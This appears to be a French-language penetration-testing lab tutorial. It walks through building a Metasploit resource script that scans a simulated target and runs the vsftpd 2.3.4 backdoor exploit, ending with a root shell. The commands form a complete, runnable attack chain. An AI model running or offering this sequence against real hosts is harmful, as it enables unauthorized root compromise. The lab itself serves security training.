Automatiser les attaques avec les scripts de ressources Metasploit

Kali LinuxBeginner
Pratiquer maintenant

Introduction

Bienvenue dans ce laboratoire sur l'automatisation des attaques avec les scripts de ressources Metasploit. Le Metasploit Framework est un outil puissant pour les tests d'intrusion, mais la saisie manuelle des commandes pour chaque engagement peut être répétitive et chronophage. Les scripts de ressources, qui sont de simples fichiers texte avec une extension .rc, vous permettent d'automatiser ces séquences de commandes.

Dans ce laboratoire, vous apprendrez à créer un script de ressources pour automatiser une chaîne d'attaque complète contre un service vulnérable. Cela inclut la configuration d'un espace de travail (workspace), le scan de la cible, la sélection d'un exploit, sa configuration et le lancement de l'attaque. À la fin de ce laboratoire, vous serez capable de créer vos propres scripts pour optimiser vos flux de travail de tests d'intrusion.

Pour ce laboratoire, nous ciblerons une machine vulnérable simulée. Supposons que l'adresse IP de la machine cible soit 10.0.2.15.

Créer un nouveau fichier avec une extension .rc

Dans cette étape, vous allez créer le fichier de script de ressources. Un script de ressources Metasploit est simplement un fichier texte contenant une liste de commandes msfconsole qui sont exécutées séquentiellement. Par convention, ces fichiers ont une extension .rc.

Nous utiliserons l'éditeur de texte nano pour créer un fichier nommé attack.rc dans le répertoire par défaut ~/project.

Ouvrez votre terminal et exécutez la commande suivante pour créer et ouvrir le nouveau fichier :

nano attack.rc

Cette commande ouvrira un fichier vide dans l'éditeur nano. Pour l'instant, enregistrez simplement le fichier vide et quittez l'éditeur en appuyant sur Ctrl+X, puis Y, et enfin Entrée. Vous avez maintenant créé le fichier de script de ressources que vous remplirez dans les étapes suivantes.

Ajouter une séquence de commandes msfconsole au fichier

Dans cette étape, vous allez ajouter les commandes initiales à votre script de ressources. Ces commandes configureront un espace de travail dédié pour notre test et exécuteront un scan Nmap de base pour collecter des informations sur la cible. L'organisation du travail en espaces de travail est une bonne pratique dans Metasploit.

Tout d'abord, ouvrez à nouveau le fichier attack.rc en utilisant nano :

nano attack.rc

Maintenant, ajoutez les lignes suivantes au fichier. La première commande crée un nouvel espace de travail nommé vsftpd_lab, et la seconde commande exécute un scan Nmap contre notre cible (10.0.2.15) et enregistre les résultats dans la base de données.

workspace -a vsftpd_lab
db_nmap -A 10.0.2.15

Après avoir ajouté ces deux lignes, votre fichier attack.rc devrait ressembler exactement à ceci. Enregistrez le fichier et quittez nano en appuyant sur Ctrl+X, Y, et Entrée.

Inclure des commandes pour utiliser un exploit, définir des options et exécuter

Dans cette étape, vous allez ajouter les commandes d'attaque principales au script. Nous ciblerons une vulnérabilité connue dans le serveur VSFTPD, spécifiquement l'exploit vsftpd_234_backdoor. Vous ajouterez des commandes pour sélectionner cet exploit, définir l'option de cible requise, et enfin, l'exécuter.

Ouvrez à nouveau le fichier attack.rc avec nano :

nano attack.rc

Ajoutez les commandes suivantes à la fin du fichier. Ces commandes indiquent à Metasploit de :

  1. use exploit/unix/ftp/vsftpd_234_backdoor : Sélectionner le module d'exploit spécifique.
  2. set RHOSTS 10.0.2.15 : Définir l'option RHOSTS (Remote Hosts) à l'adresse IP de notre cible.
  3. exploit : Lancer l'attaque.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit

Après avoir ajouté ces lignes, votre fichier attack.rc complet devrait maintenant contenir les cinq commandes suivantes :

workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit

Enregistrez les modifications et quittez l'éditeur nano (Ctrl+X, Y, Entrée). Votre script d'attaque automatisé est maintenant terminé.

Lancer msfconsole avec le flag -r pour exécuter le script

Dans cette étape, vous allez exécuter le script de ressources que vous venez de créer. La console Metasploit, msfconsole, peut être lancée avec le flag -r suivi du chemin vers un script de ressources. Cela indique à Metasploit d'exécuter les commandes du fichier spécifié au démarrage.

Assurez-vous d'être dans le répertoire ~/project où se trouve votre fichier attack.rc. Exécutez maintenant la commande suivante dans votre terminal :

msfconsole -r attack.rc

Cette commande lancera le Metasploit Framework. Au lieu de vous présenter immédiatement l'invite habituelle msf6 >, elle commencera à exécuter chaque commande de attack.rc une par une.

Observer l'exécution automatisée de la chaîne d'attaque

Dans cette dernière étape, vous observerez les résultats de votre script automatisé. Pendant que msfconsole s'exécute, vous verrez la sortie de chaque commande de votre fichier attack.rc. Vous verrez l'espace de travail être créé, le scan Nmap s'exécuter, l'exploit être configuré, et enfin, l'attaque être lancée.

Si l'attaque réussit, Metasploit ouvrira une session de shell de commande sur la machine cible. Vous verrez un message similaire à celui-ci :

[*] Found shell.
[*] Command shell session 1 opened (10.0.2.4:42931 -> 10.0.2.15:6200) at 2023-10-27 10:30:00 -0400

Vous êtes maintenant dans un shell sur la cible compromise. Pour vérifier cela, vous pouvez exécuter une commande comme whoami pour voir sous quel utilisateur vous êtes en cours d'exécution.

whoami

La sortie attendue devrait être :

root

Cela confirme que votre script automatisé a réussi à compromettre la cible et à obtenir un accès root.

Pour nettoyer, tapez exit pour fermer la session du shell de commande, puis tapez à nouveau exit pour quitter msfconsole.

Résumé

Dans ce laboratoire, vous avez appris avec succès à automatiser un flux de travail de test d'intrusion à l'aide de scripts de ressources Metasploit.

Vous avez commencé par créer un fichier de script de ressources (attack.rc). Ensuite, vous l'avez rempli avec une séquence de commandes msfconsole pour effectuer une chaîne d'attaque complète : création d'un espace de travail, scan de la cible, sélection et configuration d'un exploit, et enfin, lancement de l'attaque. Vous avez appris à exécuter ce script en utilisant la commande msfconsole -r et avez observé l'exécution automatisée.

Cette compétence est inestimable pour gagner du temps et assurer la cohérence de vos évaluations de sécurité. Vous pouvez désormais créer des scripts plus complexes pour automatiser diverses tâches répétitives dans vos futurs engagements.